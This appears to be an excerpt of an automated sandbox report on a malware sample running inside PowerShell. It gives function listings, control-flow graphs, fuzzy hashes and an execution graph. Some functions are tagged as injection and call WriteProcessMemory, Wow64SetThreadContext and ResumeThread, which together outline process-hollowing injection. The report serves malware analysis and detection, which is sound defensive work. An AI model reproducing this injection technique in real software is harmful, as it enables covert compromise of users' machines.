35452b 674->680 679->675 680->675
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$$p$$p
                                • API String ID: 0-2931952147
                                • Opcode ID: c3dca66c2c451a1ab062bbcee9a93d43fc9b69368a4441b8a1001139abddaf41
                                • Instruction ID: b9fbe5767b1a2b4f70c4892acf18b9205a349a8c44a68cb0f68f6283d9ab2590
                                • Opcode Fuzzy Hash: c3dca66c2c451a1ab062bbcee9a93d43fc9b69368a4441b8a1001139abddaf41
                                • Instruction Fuzzy Hash: 403128706043449FCF2A8E25D400B7A7BB59F8230AF268466DC449B5A1EB75CCCADB21
                                Function 002A8E48 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 836 2a8e48-2a8eb3 838 2a8eca-2a8f31 WriteProcessMemory 836->838 839 2a8eb5-2a8ec7 836->839 841 2a8f3a-2a8f8c 838->841 842 2a8f33-2a8f39 838->842 839->838 842->841
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002A8F1B
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 0cee31d59c51a34d9b0f1a6b0d38d17b968712549acbd73e2ea58afd42e75eca
                                • Instruction ID: 5a90e9a9fdf09ddb2fcf373fe4814d5f184c9d3852fe7c4c16018a9d1f0d6412
                                • Opcode Fuzzy Hash: 0cee31d59c51a34d9b0f1a6b0d38d17b968712549acbd73e2ea58afd42e75eca
                                • Instruction Fuzzy Hash: 6241AAB4D002499FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D734AA55CF64
                                Function 002A8AF8 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 847 2a8af8-2a8b60 850 2a8b62-2a8b74 847->850 851 2a8b77-2a8bc5 Wow64SetThreadContext 847->851 850->851 853 2a8bce-2a8c1a 851->853 854 2a8bc7-2a8bcd 851->854 854->853
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 002A8BAF
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 407ecdcdd8f37d158370f937d23596defc0571f4c6d901b3a7d1b7ae4f93c158
                                • Instruction ID: b069f4f0ac6cc155bf70a862e4d58cdfca5819ae37fdb7650b0fbcb28878cecd
                                • Opcode Fuzzy Hash: 407ecdcdd8f37d158370f937d23596defc0571f4c6d901b3a7d1b7ae4f93c158
                                • Instruction Fuzzy Hash: 3B41CCB5D102599FCF10CFA9D984AEEFBB1BF49314F24842AE414B7240D7789945CF64
                                Function 002A8B00 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 859 2a8b00-2a8b60 861 2a8b62-2a8b74 859->861 862 2a8b77-2a8bc5 Wow64SetThreadContext 859->862 861->862 864 2a8bce-2a8c1a 862->864 865 2a8bc7-2a8bcd 862->865 865->864
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 002A8BAF
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: ee46228a10054a03c96d502fadc05ee48dc13209ad35a7faeb33e8f45214f0d2
                                • Instruction ID: 9909c84c306db347e8748c861fb4a03a403e4192c727793ad97dd0d190d7617b
                                • Opcode Fuzzy Hash: ee46228a10054a03c96d502fadc05ee48dc13209ad35a7faeb33e8f45214f0d2
                                • Instruction Fuzzy Hash: AD41AAB4D102599FCB10CFA9D984AEEFBB1AB49314F24842AE418B7250D778A949CF64
                                Function 002A8A08 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 870 2a8a08-2a8aa4 ResumeThread 873 2a8aad-2a8aef 870->873 874 2a8aa6-2a8aac 870->874 874->873
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 002A8A8E
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 0de039b41e9a0094c43df9ad30967b6f104b31fbe2fef6c3c546dac5ee2719df
                                • Instruction ID: f63f5cff9210cab10bbe9fa68ba0f4d096856ab452b5aedc348ae1550e510e80
                                • Opcode Fuzzy Hash: 0de039b41e9a0094c43df9ad30967b6f104b31fbe2fef6c3c546dac5ee2719df
                                • Instruction Fuzzy Hash: E931D9B4D102589FCF10CFA9D980AEEFBB1EB49314F14982AE814B7311CB34A906CF94
                                Function 002A8A10 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 879 2a8a10-2a8aa4 ResumeThread 882 2a8aad-2a8aef 879->882 883 2a8aa6-2a8aac 879->883 883->882
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 002A8A8E
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 1367f7b551ce048ae39a9f25ced964821f8331808e318ae65c937f06e8aeffad
                                • Instruction ID: 2e76ca8b9534bcaa8e4137983c2b3b62ffc760cfea589afb3483c845f58611bd
                                • Opcode Fuzzy Hash: 1367f7b551ce048ae39a9f25ced964821f8331808e318ae65c937f06e8aeffad
                                • Instruction Fuzzy Hash: FE31BAB4D102199FCF10CFA9D984AAEFBB5EF49314F14942AE815B7300DB35A905CF94
                                Function 00353DD4 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 909 353dd4-353e0b 910 353e11-353e16 909->910 911 353f62-353fa6 909->911 912 353e2e-353e32 910->912 913 353e18-353e1e 910->913 934 353fb4-353fcc 911->934 935 353fa8-353faa 911->935 917 353f0f-353f19 912->917 918 353e38-353e3a 912->918 915 353e20 913->915 916 353e22-353e2c 913->916 915->912 916->912 919 353f27-353f2d 917->919 920 353f1b-353f24 917->920 921 353e3c-353e48 918->921 922 353e4a 918->922 925 353f33-353f3f 919->925 926 353f2f-353f31 919->926 923 353e4c-353e4e 921->923 922->923 923->917 928 353e54-353e58 923->928 929 353f41-353f5f 925->929 926->929 930 353e78 928->930 931 353e5a-353e76 928->931 936 353e7a-353e7c 930->936 931->936 944 353fd0-353fd2 934->944 945 353fce 934->945 935->934 936->917 939 353e82-353e85 936->939 943 353e8f-353e95 939->943 947 353e9b-353e9d 943->947 946 353fdc-353fdd 944->946 945->946 948 353eb5-353f0c 947->948 949 353e9f-353ea5 947->949 951 353ea7 949->951 952 353ea9-353eab 949->952 951->948 952->948
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p
                                • API String ID: 0-481844870
                                • Opcode ID: 86304c51306b20ca3df1fa6b1cc46282b57a6572ad4857d7f15dec45e7e65c05
                                • Instruction ID: 6ce865f77248da25f26cfcb175b1d8d727a86aa8ab300c11afb83ff18083883b
                                • Opcode Fuzzy Hash: 86304c51306b20ca3df1fa6b1cc46282b57a6572ad4857d7f15dec45e7e65c05
                                • Instruction Fuzzy Hash: 3821C532A052049FCB569E28C452BAABBF4AF85392F268066DC05C7271D770CE49C791
                                Function 00354D40 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 953 354d40-354d62 954 354edf-354f2a 953->954 955 354d68-354d6d 953->955 962 354f30-354f35 954->962 963 3550ad-3550c9 954->963 956 354d85-354d91 955->956 957 354d6f-354d75 955->957 964 354d97-354d9a 956->964 965 354e8a-354e94 956->965 958 354d77 957->958 959 354d79-354d83 957->959 958->956 959->956 967 354f37-354f3d 962->967 968 354f4d-354f51 962->968 964->965 970 354da0-354da7 964->970 973 354e96-354e9f 965->973 974 354ea2-354ea8 965->974 975 354f41-354f4b 967->975 976 354f3f 967->976 971 354f57-354f5b 968->971 972 355058-355062 968->972 970->954 979 354dad-354db2 970->979 982 354f5d-354f6e 971->982 983 354f9b 971->983 980 355064-35506d 972->980 981 355070-355076 972->981 977 354eae-354eba 974->977 978 354eaa-354eac 974->978 975->968 976->968 984 354ebc-354edc 977->984 978->984 986 354db4-354dba 979->986 987 354dca-354dce 979->987 988 35507c-355088 981->988 989 355078-35507a 981->989 982->963 1000 354f74-354f79 982->1000 990 354f9d-354f9f 983->990 993 354dbc 986->993 994 354dbe-354dc8 986->994 987->965 997 354dd4-354dd8 987->997 995 35508a-3550aa 988->995 989->995 990->972 991 354fa5-354fa9 990->991 991->972 998 354faf-354fb3 991->998 993->987 994->987 1002 354df8 997->1002 1003 354dda-354df6 997->1003 1005 354fb5-354fbe 998->1005 1006 354fd6 998->1006 1008 354f91-354f99 1000->1008 1009 354f7b-354f81 1000->1009 1004 354dfa-354dfc 1002->1004 1003->1004 1004->965 1011 354e02-354e0f 1004->1011 1012 354fc5-354fd2 1005->1012 1013 354fc0-354fc3 1005->1013 1015 354fd9-354fe6 1006->1015 1008->990 1016 354f85-354f8f 1009->1016 1017 354f83 1009->1017 1029 354e16-354e18 1011->1029 1019 354fd4 1012->1019 1013->1019 1026 354ffe-355055 1015->1026 1027 354fe8-354fee 1015->1027 1016->1008 1017->1008 1019->1015 1030 354ff0 1027->1030 1031 354ff2-354ff4 1027->1031 1032 354e30-354e87 1029->1032 1033 354e1a-354e20 1029->1033 1030->1026 1031->1026 1034 354e24-354e26 1033->1034 1035 354e22 1033->1035 1034->1032 1035->1032
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p
                                • API String ID: 0-481844870
                                • Opcode ID: 87d6788f91ecad5a1e86d39d133034466dc2ca0bc49c4903a9748334636273c8
                                • Instruction ID: a8c2400c2d4298a23ccc1800a98bfac7a5eb0bc84f714cccdf60c10d9cabd6a0
                                • Opcode Fuzzy Hash: 87d6788f91ecad5a1e86d39d133034466dc2ca0bc49c4903a9748334636273c8
                                • Instruction Fuzzy Hash: 5A218E30A00205DBCB2EDE68C556F69B7F9BB8435AF168066D80887275D771DCC9CB91
                                Function 00353DE8 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1037 353de8-353e0b 1038 353e11-353e16 1037->1038 1039 353f62-353fa6 1037->1039 1040 353e2e-353e32 1038->1040 1041 353e18-353e1e 1038->1041 1062 353fb4-353fcc 1039->1062 1063 353fa8-353faa 1039->1063 1045 353f0f-353f19 1040->1045 1046 353e38-353e3a 1040->1046 1043 353e20 1041->1043 1044 353e22-353e2c 1041->1044 1043->1040 1044->1040 1047 353f27-353f2d 1045->1047 1048 353f1b-353f24 1045->1048 1049 353e3c-353e48 1046->1049 1050 353e4a 1046->1050 1053 353f33-353f3f 1047->1053 1054 353f2f-353f31 1047->1054 1051 353e4c-353e4e 1049->1051 1050->1051 1051->1045 1056 353e54-353e58 1051->1056 1057 353f41-353f5f 1053->1057 1054->1057 1058 353e78 1056->1058 1059 353e5a-353e76 1056->1059 1064 353e7a-353e7c 1058->1064 1059->1064 1072 353fd0-353fd2 1062->1072 1073 353fce 1062->1073 1063->1062 1064->1045 1067 353e82-353e95 1064->1067 1075 353e9b-353e9d 1067->1075 1074 353fdc-353fdd 1072->1074 1073->1074 1076 353eb5-353f0c 1075->1076 1077 353e9f-353ea5 1075->1077 1079 353ea7 1077->1079 1080 353ea9-353eab 1077->1080 1079->1076 1080->1076
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p
                                • API String ID: 0-481844870
                                • Opcode ID: e05ea7165da56ce583afeb61ed3567d502eea7f475fbaa22b39998d4a6ed768f
                                • Instruction ID: d92092541d23b606ea0ba356da748fff3e8bce67cb63cc960f53919bb443365c
                                • Opcode Fuzzy Hash: e05ea7165da56ce583afeb61ed3567d502eea7f475fbaa22b39998d4a6ed768f
                                • Instruction Fuzzy Hash: 09117532A00204DFCB55DE29C442FA9BBF5AF84392F258066EC0987271D771DF49C791
                                Function 003552CE Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (op
                                • API String ID: 0-3117038
                                • Opcode ID: 8bc82e14ce883f733873aeaf35cd058fa687b7d02a022d429f11278a4c09a6b3
                                • Instruction ID: c764b340a0b7687bf8403b28b64873db2897be096abe5e234ccb2190cd50db87
                                • Opcode Fuzzy Hash: 8bc82e14ce883f733873aeaf35cd058fa687b7d02a022d429f11278a4c09a6b3
                                • Instruction Fuzzy Hash: 5321B435700A05DFDB268E25C865FAE77A1BB40343F258465EC1A8B5F0C7B4EC9ACB41
                                Function 00351189 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f3815194abf33a2db17e3ae87385b8e6817ea1e93d67f27ab16c1b765bfd1f77
                                • Instruction ID: 03db4f0b86dbff614e8e681f5e7c11e972613445c5f3fa5fadef2e860d3270bb
                                • Opcode Fuzzy Hash: f3815194abf33a2db17e3ae87385b8e6817ea1e93d67f27ab16c1b765bfd1f77
                                • Instruction Fuzzy Hash: 3611CE2464E3C42FC76697754C69B6E6FB68F86301F5584AEE481DF2E3C8A54D098322
                                Function 001AD006 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.373229543.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_1ad000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a455987ca16eb2fe5cc784a79182d9e8255756fd299ccdf42b87c2bb8322f4e
                                • Instruction ID: 7b9cfb0e8447e9f2cd423bfdbad66fbed7a7d59068f411006abe356c314d539b
                                • Opcode Fuzzy Hash: 9a455987ca16eb2fe5cc784a79182d9e8255756fd299ccdf42b87c2bb8322f4e
                                • Instruction Fuzzy Hash: D601DE6140C3C09FD7134B259D98762BFB8EF03224F1984DBE8848F2A3C2689C49C772
                                Function 001AD01D Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.373229543.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_1ad000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bffd949c3766a50aaf8d893414a1b2fd9cd0d9a00f3a6a696489d7a2e0738006
                                • Instruction ID: cd20e0b615df865dc0b085ec6b89e95bdb2cd43cbdda4e1472f30ce4b38e81aa
                                • Opcode Fuzzy Hash: bffd949c3766a50aaf8d893414a1b2fd9cd0d9a00f3a6a696489d7a2e0738006
                                • Instruction Fuzzy Hash: BE01F775404780AAE7114E25E984B6BBFD8EF42724F28841AFC464B686C7B9D845C6B1
                                Function 003511B0 Relevance: .0, Instructions: 41COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 491218917fffab96d49349db164197fe552ed035b48c9aebbba30c3f14a6884a
                                • Instruction ID: ff37e16ed0657607583dab821c0b45d7ecc7832efcdd775a90b52a8f7b48dbbd
                                • Opcode Fuzzy Hash: 491218917fffab96d49349db164197fe552ed035b48c9aebbba30c3f14a6884a
                                • Instruction Fuzzy Hash: 8BF0287474034837C764576A8815F6F589A9FC9701F508418F8059F3C1CDB29C048351

                                Non-executed Functions

                                Function 003500A0 Relevance: 17.9, Strings: 14, Instructions: 410COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$\9.$`8.$`8.$`8.$$p$$p
                                • API String ID: 0-757042156
                                • Opcode ID: c69eb1835a577dd73c34413d2d1d332d6fd85c76a7a5de249cf7a2527a4f8b40
                                • Instruction ID: fe58553359cc50fb6964c1ebb2aedef9b7c952c9864de6a7ee24396bf54592ca
                                • Opcode Fuzzy Hash: c69eb1835a577dd73c34413d2d1d332d6fd85c76a7a5de249cf7a2527a4f8b40
                                • Instruction Fuzzy Hash: 0AE12935700244DFCB1A8F68D854B6E7BB6AFC0311F198466ED458B2A1DB72CD49CB91
                                Function 00351420 Relevance: 15.4, Strings: 12, Instructions: 380COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$4:.$4:.$h%g$h%g$$p$$p$$p$$p$9.$9.
                                • API String ID: 0-3801674591
                                • Opcode ID: 1637c8cb856781d6e2701d6fa2330e7ee9ed27d7187b262c66516a9a99b1b05e
                                • Instruction ID: e0e785daffda4e04d7e9ec75ad16f0d7f6c282d06f640de7fbe9dd71dfbb01b1
                                • Opcode Fuzzy Hash: 1637c8cb856781d6e2701d6fa2330e7ee9ed27d7187b262c66516a9a99b1b05e
                                • Instruction Fuzzy Hash: 7DC12435B042019FCB268B69D450F6AFBE6AFC5312B29847ADC45CB261DB31CD4ACB91
                                Function 00354020 Relevance: 10.2, Strings: 8, Instructions: 199COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$$p$$p$$p$$p$$p$$p
                                • API String ID: 0-2834719986
                                • Opcode ID: 21993180557915bc4dafe3d5a9c4c86cb36e70421a90cd4b9b2430a231970b2e
                                • Instruction ID: 894b76e1d338838fd6485ab976c33256bcb7ea13775505307be98618467432e0
                                • Opcode Fuzzy Hash: 21993180557915bc4dafe3d5a9c4c86cb36e70421a90cd4b9b2430a231970b2e
                                • Instruction Fuzzy Hash: E35148317042108FC71A9B699810A7AFFB6AFD1316F29847BD945CB2A1DE31CDC9C7A1
                                Function 00351B58 Relevance: 10.2, Strings: 8, Instructions: 186COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $p$$p$$p$$p$$p$$p$[g$[g
                                • API String ID: 0-1459909132
                                • Opcode ID: bf05eb8ed43b1ad89e8cc36673dfb01723d823a3cefef87ebe4d57480eec8142
                                • Instruction ID: 4fe9fdb9bf8f8a46ed34215d0f3f70bdd044a894b633172819c354ac844bfa12
                                • Opcode Fuzzy Hash: bf05eb8ed43b1ad89e8cc36673dfb01723d823a3cefef87ebe4d57480eec8142
                                • Instruction Fuzzy Hash: C6512236B043418FCB268A699410B7AFBF6AFC1312F29846BDC55C7261EB72CC49C761
                                Function 00350968 Relevance: 6.4, Strings: 5, Instructions: 191COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: T;.$tPp$tPp$[g$[g
                                • API String ID: 0-3685377804
                                • Opcode ID: 588c950d36d63cfbf758dab76f58c7bc87dfc7a2f236bfbe328b25e11b8be9b8
                                • Instruction ID: 393ff46831bd473630c53b05cd670d0884e5d52548a2c9b58c35e1d535197ea9
                                • Opcode Fuzzy Hash: 588c950d36d63cfbf758dab76f58c7bc87dfc7a2f236bfbe328b25e11b8be9b8
                                • Instruction Fuzzy Hash: F0512C357043409FD7298B69C850F7ABFA6AFC1312F24847AED458B2A5CA73DC49C751
                                Function 00351EC8 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: h%g$h%g$$p$$p$$p
                                • API String ID: 0-3465359037
                                • Opcode ID: 6006eea74423a94d263054cd9f23eb10479e1fea71ecb3e3fa82eee2f4a5fe4a
                                • Instruction ID: 96bb46e8bb1a8324744510dad8682411210e9ab6bb705ad3df50d1f0527c2ee2
                                • Opcode Fuzzy Hash: 6006eea74423a94d263054cd9f23eb10479e1fea71ecb3e3fa82eee2f4a5fe4a
                                • Instruction Fuzzy Hash: DF5146357002019FCB269A299840F6BFBE6AFC5312F29857AEC05D72A1DB71DC49C7A1
                                Function 00350F50 Relevance: 6.4, Strings: 5, Instructions: 166COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 89.$h%g$h%g$tPp$tPp
                                • API String ID: 0-3295721131
                                • Opcode ID: e9353e9aeb4fe54a2a2fda92ed832b1cfaa22c6f55f84dd612aa8c998339ec6c
                                • Instruction ID: 420fa7de14ad81889b7193b934b7d770eab097bc1dd7a1253c4d7f2b39be972c
                                • Opcode Fuzzy Hash: e9353e9aeb4fe54a2a2fda92ed832b1cfaa22c6f55f84dd612aa8c998339ec6c
                                • Instruction Fuzzy Hash: B3512931B043918FC7258A699850F7AFFB6AF85311F59807ADD44CB2A1CA72CC89C761
                                Function 00353374 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$tPp$tPp
                                • API String ID: 0-1182518146
                                • Opcode ID: bde075c0f6da678bface19cb584835b20c99ecf3049b01c7c2a1767557cd2547
                                • Instruction ID: 952f63f1b07eac7f9f7db5f3006a54a764deef6eb47526fc59c9dedab371c28e
                                • Opcode Fuzzy Hash: bde075c0f6da678bface19cb584835b20c99ecf3049b01c7c2a1767557cd2547
                                • Instruction Fuzzy Hash: C1614835B002009FCB1A8F29D410F7ABBA2AF85392F25C469DD458F3A0DE71DE49CB91
                                Function 003518D0 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$X:.$X:.
                                • API String ID: 0-2730352865
                                • Opcode ID: ffdaa999dd9a4c8edd18714616da5ae5923eed1133d3a6cbd077478fe09a847b
                                • Instruction ID: 0c86b05b7708d9d44c47c75bbe18ca51dcdb3accb8788e08e09b11d5d8439e83
                                • Opcode Fuzzy Hash: ffdaa999dd9a4c8edd18714616da5ae5923eed1133d3a6cbd077478fe09a847b
                                • Instruction Fuzzy Hash: 382109317003006BD7299A6CC460F7EBA979FC5712F648429ED498B394DFB2CC45C791

                                Execution Graph

                                Execution Coverage:4.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:4.8%
                                Total number of Nodes:1589
                                Total number of Limit Nodes:54
                                execution_graph 47241 445847 47242 445852 47241->47242 47244 44587b 47242->47244 47246 445877 47242->47246 47247 448a84 47242->47247 47254 44589f DeleteCriticalSection 47244->47254 47255 4484ca 47247->47255 47250 448ac9 InitializeCriticalSectionAndSpinCount 47251 448ab4 47250->47251 47262 434fcb 47251->47262 47253 448ae0 47253->47242 47254->47246 47256 4484f6 47255->47256 47257 4484fa 47255->47257 47256->47257 47261 44851a 47256->47261 47269 448566 47256->47269 47257->47250 47257->47251 47259 448526 GetProcAddress 47260 448536 __crt_fast_encode_pointer 47259->47260 47260->47257 47261->47257 47261->47259 47263 434fd6 IsProcessorFeaturePresent 47262->47263 47264 434fd4 47262->47264 47266 435018 47263->47266 47264->47253 47276 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47266->47276 47268 4350fb 47268->47253 47270 448587 LoadLibraryExW 47269->47270 47274 44857c 47269->47274 47271 4485a4 GetLastError 47270->47271 47272 4485bc 47270->47272 47271->47272 47275 4485af LoadLibraryExW 47271->47275 47273 4485d3 FreeLibrary 47272->47273 47272->47274 47273->47274 47274->47256 47275->47272 47276->47268 47277 434887 47278 434893 ___FrameUnwindToState 47277->47278 47304 434596 47278->47304 47280 43489a 47282 4348c3 47280->47282 47610 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47280->47610 47290 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47282->47290 47315 444251 47282->47315 47285 4348e2 ___FrameUnwindToState 47287 434962 47323 434b14 47287->47323 47290->47287 47611 4433e7 36 API calls 5 library calls 47290->47611 47297 434984 47298 43498e 47297->47298 47613 44341f 28 API calls _abort 47297->47613 47300 434997 47298->47300 47614 4433c2 28 API calls _abort 47298->47614 47615 43470d 13 API calls 2 library calls 47300->47615 47303 43499f 47303->47285 47305 43459f 47304->47305 47616 434c52 IsProcessorFeaturePresent 47305->47616 47307 4345ab 47617 438f31 47307->47617 47309 4345b0 47314 4345b4 47309->47314 47626 4440bf 47309->47626 47312 4345cb 47312->47280 47314->47280 47316 444268 47315->47316 